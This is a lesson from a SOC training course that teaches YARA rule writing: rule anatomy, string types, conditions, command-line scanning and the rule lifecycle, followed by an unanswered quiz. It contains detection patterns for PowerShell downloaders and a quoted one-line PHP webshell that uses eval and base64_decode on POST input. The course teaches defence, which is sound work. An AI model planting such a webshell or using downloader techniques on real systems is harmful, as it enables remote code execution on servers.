Lesson 1 of 6·13 min read·Includes quiz

YARA Fundamentals

Meta, strings, condition

What You'll Learn

  • Explain what YARA is and why SOC analysts use it to detect malware, webshells, and suspicious files
  • Identify the three mandatory sections of every YARA rule: meta, strings, and condition
  • Write a basic YARA rule that detects a file containing specific text, hex, and regex patterns
  • Run YARA from the command line to scan a single file and a directory
  • Describe the YARA rule lifecycle from discovery through deployment and maintenance
  • Connect YARA fundamentals to the hands-on exercises in Lab 7.1

What Is YARA and Why Does It Matter?

Every SOC analyst eventually encounters a question no SIEM alert can answer on its own: "Is this file malicious?" A Wazuh alert tells you that a suspicious file appeared on an endpoint. Suricata tells you that a binary was downloaded over HTTP. MISP tells you that a hash matches a known malware family. But none of these tools can look inside an arbitrary file and tell you what patterns it contains, what strings are embedded in it, or whether its structure matches a known threat signature.

That is what YARA does.

YARA is a pattern-matching tool designed specifically for malware detection and classification. Created by Victor Alvarez at VirusTotal, it lets you write rules that describe textual, hexadecimal, and regex patterns found in files. When you run YARA against a file or directory, it checks every file against your rules and reports matches. Think of YARA rules as custom signatures — you define exactly what you are looking for, and YARA finds it.

Here is what makes YARA indispensable in SOC operations:

Use CaseHow YARA Helps
Malware detectionWrite a rule for a known malware family's unique strings. Scan uploads, downloads, and quarantine folders.
Webshell huntingWrite rules for common webshell indicators (eval, base64_decode, cmd.exe). Scan entire web directories to find planted shells.
Incident responseDuring an active investigation, write a rule for the attacker's tools and scan the affected endpoint to find all instances.
Threat huntingDeploy YARA rules across your fleet via Velociraptor to proactively search for indicators before alerts fire.
File classificationCategorize files by type: is this a PE executable? A PDF with embedded JavaScript? An Office document with macros?
Indicator operationalizationWhen threat intel provides IOCs like file hashes, strings, or byte patterns, convert them into YARA rules for automated scanning.

YARA is used by antivirus companies, CERT teams, threat intelligence platforms (including MISP and VirusTotal), and incident responders worldwide. The 523+ YARA rules pre-installed on CyberBlueSOC at /opt/yara-rules/ were written by the security community to detect everything from commodity ransomware to nation-state APT tools.

YARA is not an antivirus. It does not run in the background monitoring files in real time. It is a scanning tool that you point at targets on demand. You write rules, you run scans, you review results. This makes YARA flexible (you can scan anything — files, directories, memory dumps, disk images) but also means it requires analyst skill to use effectively. The quality of your detection depends entirely on the quality of your rules.

Anatomy of a YARA Rule

Every YARA rule follows the same structure. There are exactly three sections you need to understand: meta, strings, and condition. Once you master this structure, you can read and write any YARA rule.

YARA rule anatomy — the three sections: meta (who and why), strings (what to look for), and condition (the logic that triggers)

Here is a complete YARA rule with all three sections:

rule Detect_Malicious_Script
{
    meta:
        author = "CyberBlue Academy"
        description = "Detects a PowerShell downloader script"
        date = "2026-02-17"
        reference = "https://cyberblue.academy/module-7"
        severity = "high"

    strings:
        $download = "DownloadString" nocase
        $iex = "Invoke-Expression" nocase
        $webclient = "Net.WebClient" nocase
        $hidden = "-WindowStyle Hidden" nocase
        $encoded = "-enc" nocase

    condition:
        filesize < 100KB and
        3 of them
}

Let us break down each section.

Section 1: meta

The meta section contains descriptive information about the rule. It has zero effect on matching — YARA ignores it during scanning. But it is critical for rule management:

FieldPurposeExample
authorWho wrote the rule"SOC Team - CyberBlue"
descriptionWhat the rule detects"PowerShell downloader using Net.WebClient"
dateWhen the rule was created or last updated"2026-02-17"
referenceThreat report, blog post, or sample hash"https://example.com/report-123"
severityHow critical a match is"critical", "high", "medium", "low"
hashSHA256 of the original sample"a1b2c3d4e5f6..."
mitre_att_ckATT&CK technique ID"T1059.001"
tlpTraffic Light Protocol marking"TLP:GREEN"

Good metadata makes rules maintainable. When you have 500+ rules and one starts producing false positives, the author, date, and reference fields help you trace why the rule was created and whether it is still relevant.

Section 2: strings

The strings section defines the patterns YARA looks for inside files. Every string variable starts with a $ sign. You can define three types of strings:

Text strings — human-readable strings found in the file:

$download = "DownloadString"
$url = "http://malware.example.com/payload"
$cmd = "cmd.exe /c"

Hex strings — raw byte sequences in curly braces:

$mz_header = { 4D 5A 90 00 }
$shellcode = { 68 74 74 70 3A 2F 2F }
$call_ret = { E8 ?? ?? ?? ?? C3 }

The ?? in hex strings are wildcards — they match any byte value. This is essential for detecting shellcode where certain bytes (like offsets) change between samples.

Regular expressions — pattern matching with regex:

$ip_pattern = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/
$base64_blob = /[A-Za-z0-9+\/]{50,}={0,2}/
$c2_url = /https?:\/\/[a-z0-9\-\.]+\.(ru|cn|tk)\/[a-z]{5,}/

You can combine all three types in a single rule. The more diverse your string types, the more precise your detection.

Section 3: condition

The condition section defines the logic that determines whether a file matches the rule. This is where the real power lies:

condition:
    filesize < 100KB and 3 of them

This means: the file must be smaller than 100KB and at least 3 of the defined strings must be present. Common condition patterns:

ConditionWhat It Means
all of themEvery defined string must be present
any of themAt least one string must be present
3 of themAt least 3 strings must be present
2 of ($download*, $iex*)At least 2 strings whose names start with $download or $iex
$download and $iexBoth specific strings must be present
filesize < 1MBFile size must be under 1MB
uint16(0) == 0x5A4DFirst two bytes must be MZ (PE executable)

The filesize check is one of the most important tools for reducing false positives. If you are looking for a malicious script, limiting to filesize < 100KB eliminates large binaries, databases, and log files from consideration.

The condition section is mandatory and must evaluate to true for a match. A common beginner mistake is writing great strings but a condition that is too loose (any of them) or too strict (all of them). Start with a moderate condition like 2 of them or 3 of them and adjust based on testing. Too loose = false positives. Too strict = missed detections.

The YARA Rule Lifecycle

Writing a YARA rule is not a one-shot activity. Professional rule development follows a lifecycle that ensures rules are accurate, tested, and maintained over time.

YARA rule lifecycle — from discovering a new sample through analysis, rule writing, testing, deployment, and ongoing maintenance

Stage 1 — Discover: You encounter a new threat. This could be a malware sample from an incident response engagement, a suspicious file flagged by an analyst, or indicators from a threat intelligence report. The trigger is always the same: you need a way to detect this threat across your environment.

Stage 2 — Analyze: Before writing a rule, you need to understand the target. Use tools like strings (extract readable text), hexdump (view raw bytes), CyberChef (decode and transform), and sandbox reports (understand behavior). Your goal is to find unique, stable patterns — strings or byte sequences that appear in the malicious sample but not in legitimate software.

Stage 3 — Write: Craft your YARA rule with multiple string types, a file format check, a size constraint, and a flexible condition. Use the meta section to document what you are detecting and why.

Stage 4 — Test: Run your rule against two corpora: a set of known-bad samples (to verify detection) and a set of known-good files (to verify zero false positives). The goal is 100% true positive rate and 0% false positive rate on your test sets. In reality, you may need to iterate between writing and testing multiple times.

Stage 5 — Deploy: Push your tested rule to production scanning infrastructure. This could be Velociraptor (endpoint hunting), your CI/CD pipeline (scanning code deployments), an email gateway (scanning attachments), or a file upload scanner (scanning user uploads).

Stage 6 — Maintain: Rules are not permanent. Monitor for false positives in production. When new variants of the malware appear, update your rule to catch them. When the threat is no longer active, consider retiring the rule to keep your rule set lean. Schedule periodic reviews (quarterly is common in mature SOCs).

💡

Start your YARA journey with detection, not perfection. Your first rules will not be as elegant as the 523+ community rules. That is expected. Write a rule that catches the sample you are looking at, test it, and deploy it. You will refine your technique with each rule you write. The best YARA rule writers in the industry started exactly where you are now.

Running YARA from the Command Line

YARA is a command-line tool. The basic syntax is:

yara [options] rule_file target

Scan a single file:

yara my_rule.yar suspect.exe

Scan a directory recursively:

yara -r my_rule.yar /uploads/

Show matching strings (critical for debugging):

yara -s my_rule.yar suspect.exe

The -s flag shows which strings matched and at what offset in the file. This is invaluable when debugging why a rule matched (or did not match).

Key flags you will use constantly:

FlagPurpose
-rScan directories recursively
-sPrint matching strings with offsets
-cCount matches only (no details)
-nNegate — show files that do NOT match
-p NUse N threads for parallel scanning
-wSuppress warnings
--timeout=NSkip files that take longer than N seconds to scan

Example output with -s flag:

$ yara -s detect_downloader.yar /samples/
Detect_Malicious_Script /samples/stage1.ps1
0x42:$download: DownloadString
0x8a:$webclient: Net.WebClient
0xc1:$hidden: -WindowStyle Hidden

This tells you the rule Detect_Malicious_Script matched the file /samples/stage1.ps1. Three strings matched: $download was found at byte offset 0x42, $webclient at 0x8a, and $hidden at 0xc1.

Compiling rules for performance:

When you have many rules, you can compile them into a binary format for faster loading:

yarac all_rules.yar compiled_rules.yarc
yara compiled_rules.yarc /target/directory/

Compiled rules load significantly faster, which matters when you are scanning large directories with hundreds of rules.

🚨

Never run YARA rules from untrusted sources without reviewing them first. YARA rules can use the include directive to reference other files, and poorly written regex patterns can cause excessive CPU usage (ReDoS — Regular Expression Denial of Service). Always read the strings and conditions before executing someone else's rule. In a SOC environment, maintain a curated, reviewed rule repository rather than blindly downloading and running rules from the internet.

Your First YARA Rule: Step by Step

Let us write a complete YARA rule from scratch. Imagine you are investigating an incident where the attacker dropped a PHP web shell on a compromised web server. You found the web shell and now want to scan all web servers for similar files.

Step 1 — Analyze the sample. You examine the web shell and find these distinctive patterns:

<?php eval(base64_decode($_POST['cmd'])); ?>

The key indicators are: the eval function, base64_decode, and $_POST (reading user input from an HTTP POST request).

Step 2 — Write the rule:

rule Webshell_PHP_Eval
{
    meta:
        author = "CyberBlue Academy"
        description = "Detects PHP web shells using eval with base64_decode"
        date = "2026-02-17"
        severity = "critical"
        mitre_att_ck = "T1505.003"

    strings:
        $eval = "eval(" nocase
        $b64 = "base64_decode" nocase
        $post = "$_POST" nocase
        $get = "$_GET" nocase
        $request = "$_REQUEST" nocase
        $system = "system(" nocase
        $exec = "exec(" nocase
        $passthru = "passthru(" nocase
        $php_tag = "<?php"

    condition:
        filesize < 50KB and
        $php_tag and
        $eval and
        ($b64 or $system or $exec or $passthru) and
        ($post or $get or $request)
}

Step 3 — Test the rule:

# Test against the known web shell (should match)
yara -s webshell_rule.yar /evidence/webshell.php

# Test against a clean PHP application (should NOT match)
yara -r webshell_rule.yar /var/www/clean_app/

# Count matches across the entire web directory
yara -rc webshell_rule.yar /var/www/

Step 4 — Analyze results. If the rule matches the known web shell and does not match any clean PHP files, it is ready for deployment. If it produces false positives, tighten the condition (require more strings, add additional unique patterns from the web shell sample).

This rule demonstrates several best practices:

  • Multiple string types covering different web shell techniques
  • File size constraint (< 50KB) — web shells are small
  • PHP tag check — only scan PHP files
  • Flexible condition — requires eval plus at least one encoding/execution function plus at least one user input source
  • ATT&CK mapping — T1505.003 is "Server Software Component: Web Shell"

Key Takeaways

  • YARA is a pattern-matching tool that scans files for text, hex, and regex patterns — it is the analyst's primary tool for custom malware detection
  • Every YARA rule has three sections: meta (descriptive info), strings (patterns to find), and condition (logic that triggers a match)
  • Text strings match human-readable content, hex strings match raw bytes (with wildcards), and regex strings match variable patterns
  • The condition section controls detection precision — filesize checks, uint16 format checks, and flexible counting (2 of them) reduce false positives
  • Professional rule development follows a lifecycle: discover, analyze, write, test, deploy, maintain
  • Key CLI flags: -r (recursive), -s (show matching strings), -c (count only), -p N (parallel threads)
  • In Lab 7.1, you will write your first YARA rule to detect a malicious script hidden among 20 files — and achieve zero false positives

What's Next

You now understand the anatomy of a YARA rule and how to run scans from the command line. In Lesson 7.2, you will dive deep into the strings section — learning modifiers like nocase, wide, fullword, xor, and base64 that make your patterns more flexible and powerful. You will also master hex string wildcards, jumps, and alternation for matching binary signatures that vary between samples.

Knowledge Check: YARA Fundamentals

10 questions · 70% to pass

1

What is the primary purpose of YARA in a SOC environment?

2

Which three sections are mandatory in every YARA rule?

3

In YARA hex strings, what does the ?? wildcard represent?

4

Which YARA condition would match a file that contains at least 2 of 5 defined strings AND is smaller than 500KB?

5

What is the purpose of the meta section in a YARA rule?

6

Why is the filesize check one of the most important condition elements for reducing false positives?

7

Which YARA command-line flag shows the matching strings and their byte offsets in the scanned file?

8

In Lab 7.1, you will scan 20 files to find a malicious script. If your YARA rule matches the malicious file but also matches 3 clean files, what is the correct next step?

9

In the YARA rule lifecycle, what happens during the 'Test' stage?

10

Which of the following is NOT a valid YARA string type?

0/10 answered